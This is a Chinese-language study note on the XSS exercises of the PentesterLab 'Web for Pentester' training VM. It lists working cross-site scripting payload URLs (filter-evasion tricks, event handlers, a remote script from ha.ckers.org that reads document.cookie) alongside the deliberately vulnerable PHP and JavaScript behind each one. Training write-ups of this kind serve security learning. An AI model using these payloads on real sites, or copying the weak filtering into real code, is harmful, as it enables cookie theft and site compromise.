Web For Pentester 学习笔记 1 - XSS

下载： https://pentesterlab.com/exercises/web_for_pentester/

我在VirtualBox虚拟机上运行web for pentester， ifconfig出的ip是192.168.102.171，设置host为：
192.168.102.171 vulnerable，浏览器访问：vulnerable

// 原始地址
http://vulnerable/xss/example1.php?name=hacker

// 弹出信息框
http://vulnerable/xss/example1.php?name=<script>alert(1);</script> 

// 如果只过滤了小写，就试试大小写混合
http://vulnerable/xss/example2.php?name=<sCript>alert(1);</sCript> 

// 鼠标移动到p，弹出
http://vulnerable/xss/example4.php?name=?name=Harry<p onmouseover=alert('黄峰喜欢吴佳旻')>把这段隐藏起来</p>

// 就算把script标签屏蔽了也能XSS
http://vulnerable/xss/example4.php?name=<div onmouseover='alert(1)' /> 

// 执行远程脚本
http://vulnerable/xss/example5.php?name=<script src="http://ha.ckers.org/xss.js"></script> 
  xss.js内容：
  document.write ("This is remote text via xss.js located at ha.ckers.org " + document.cookie);
  alert ("This is remote text via xss.js located at ha.ckers.org " + document.cookie);

// 利用ascii码输出字符，变量被直接通过GET进行了赋值
http://vulnerable/xss/example7.php?name=Harry';alert(String.fromCharCode(65, 97))//#sthash.TxtigEng.dpuf

// 危险的表单提交路径
http://vulnerable/xss/example8.php/"><script>alert(String.fromCharCode(65, 97))</script>#sthash.XuOVOUFq.dpuf

// #号也可以
http://vulnerable/xss/example9.php#Harry<script>alert('Potter')</script>

对应的带风险的源代码：

// 完全没处理
echo $_GET["name"];

// 只过滤了小写
$name = $_GET["name"];
$name = preg_replace("/<script>/", "", $name);
$name = preg_replace("/<\/script>/", "", $name);
echo $name;

$name = $_GET["name"];
$name = preg_replace("/<script>/i", "", $name);
$name = preg_replace("/<\/script>/i", "", $name);
echo $name;

// 只过滤了script
if(preg_match('/script/i', $_GET["name"])){
  die('error');
}

// 把变量赋值放到页面输出的JS里了
<script>
  var $a = "<?php echo $_GET["name"];?>";
</script>

// 就算用了实体，依然可以利用String.fromCharCode来XSS
<script>
  var $a = "<?php echo htmlentities($_GET["name"]);?>";
</script>

// 表单提交如果用PHP_SELF为路径而没做处理，那么存在XSS
略

// 这种会让#号也可以XSS
document.write(location.hash.substring(1));